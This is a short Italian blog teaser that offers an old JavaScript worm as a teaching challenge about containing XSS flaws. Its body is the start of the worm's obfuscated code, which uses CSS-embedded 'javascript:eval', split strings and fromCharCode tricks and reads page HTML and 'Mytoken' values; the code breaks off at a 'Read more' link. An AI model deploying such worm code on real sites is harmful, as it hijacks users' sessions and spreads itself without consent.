bug

A volte anche un vecchio worm js può risultare utile a livello didattico, anche per capire come sia difficile limitare i danni di eventuali falle XSS. La sfida è semplice, ecco il codice: <div id=mycode style=”BACKGROUND: url(‘java<br /> script:eval(document.all.mycode.expr)’)” expr=”var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval(‘document.body.inne’+’rHTML’)}}function getData(AU){M=getFromURL(AU,’friendID’);L=getFromURL(AU,’Mytoken’)}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split(‘&’);var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split(‘=’);AS[I[0]]=I[1]}return … [Read more…]